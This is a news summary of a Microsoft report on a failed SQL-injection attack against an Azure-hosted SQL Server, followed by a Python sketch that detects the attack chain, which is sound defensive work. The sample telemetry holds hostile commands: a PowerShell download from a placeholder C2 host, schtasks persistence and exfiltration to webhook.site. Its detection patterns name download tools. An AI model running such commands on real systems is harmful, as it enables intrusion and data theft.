In a recent report, Microsoft has unveiled details of a cyber attack campaign in which threat actors attempted, unsuccessfully, to breach a cloud environment through a SQL Server instance. Security researchers revealed that the attackers exploited a SQL injection vulnerability in an application, gaining access and elevated permissions on a Microsoft SQL Server instance deployed on an Azure Virtual Machine.
Despite this initial success, the threat actors failed to move on to additional cloud resources using the server's cloud identity. The attack involved SQL injection, reconnaissance, downloading executables, establishing persistence through a scheduled task, and attempting exfiltration via a publicly accessible tool named webhook[.]site.
The attackers sought to leverage the cloud identity of the SQL Server instance but encountered an unspecified error, resulting in the failure of their operation. This incident highlights the growing sophistication of cloud-based attack techniques, emphasizing the need for robust security measures to protect against over-privileged processes and potential risks to SQL Server instances and connected cloud resources.
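As an added illustration (not code from Microsoft's report), the following Python sketch correlates the stages listed above across constructed telemetry so a defender can see how the chain would surface in logs. The event field layout, the heuristic that OS commands spawned by `sqlservr.exe` are suspicious, and all sample events are assumptions.

```python
"""Correlate the stages of the described chain (SQL injection, recon, download,
scheduled-task persistence, exfiltration to webhook.site) from simplified events.
Constructed example: each event is (timestamp, host, parent_process, detail)."""
import re
from collections import defaultdict

# (stage, parent process that should not normally spawn this, regex on detail).
# The sqlservr.exe parent heuristic is an assumption, not from the report.
STAGE_RULES = [
    ("sqli",        None,           re.compile(r"Unclosed quotation mark|Incorrect syntax near", re.I)),
    ("recon",       "sqlservr.exe", re.compile(r"\b(whoami|hostname|systeminfo|ipconfig)\b", re.I)),
    ("download",    "sqlservr.exe", re.compile(r"Invoke-WebRequest|certutil.*-urlcache|bitsadmin", re.I)),
    ("persistence", "sqlservr.exe", re.compile(r"schtasks(\.exe)?\s+/create", re.I)),
    ("exfil",       None,           re.compile(r"webhook\.site", re.I)),
]

def classify(event):
    """Return the first stage name an event matches, or None."""
    _ts, _host, parent, detail = event
    for name, required_parent, pattern in STAGE_RULES:
        if required_parent and parent.lower() != required_parent:
            continue
        if pattern.search(detail):
            return name
    return None

def correlate(events):
    """Map each host to the distinct stages seen, in order of first appearance."""
    seen = defaultdict(list)
    for ev in sorted(events, key=lambda e: e[0]):
        stage = classify(ev)
        if stage and stage not in seen[ev[1]]:
            seen[ev[1]].append(stage)
    return dict(seen)

def flag_hosts(events, min_stages=3):
    """Hosts where at least min_stages distinct stages of the chain occurred."""
    return {h: s for h, s in correlate(events).items() if len(s) >= min_stages}

# Constructed sample telemetry: one compromised SQL VM and one benign web server.
SAMPLE_EVENTS = [
    ("2023-09-01T10:00:01Z", "sqlvm01", "sqlservr.exe", "Msg 105: Unclosed quotation mark after the character string"),
    ("2023-09-01T10:02:10Z", "sqlvm01", "sqlservr.exe", "cmd.exe /c whoami & systeminfo"),
    ("2023-09-01T10:05:42Z", "sqlvm01", "sqlservr.exe", "powershell -c Invoke-WebRequest http://EXAMPLE-C2.invalid/a.exe -OutFile a.exe"),
    ("2023-09-01T10:06:30Z", "sqlvm01", "sqlservr.exe", "schtasks /create /tn Updater /tr C:\\a.exe /sc minute"),
    ("2023-09-01T10:07:05Z", "sqlvm01", "a.exe", "outbound https://webhook.site/EXAMPLE-ID"),
    ("2023-09-01T11:00:00Z", "websrv02", "svchost.exe", "outbound https://update.microsoft.com"),
    ("2023-09-01T11:01:00Z", "websrv02", "cmd.exe", "whoami"),  # ad hoc admin use, not via SQL Server
]

if __name__ == "__main__":
    print(flag_hosts(SAMPLE_EVENTS))  # {'sqlvm01': ['sqli', 'recon', 'download', 'persistence', 'exfil']}
```

Requiring several stages on one host before alerting keeps an isolated `whoami` from an administrator's shell from firing, while the full chain from the SQL Server process stands out.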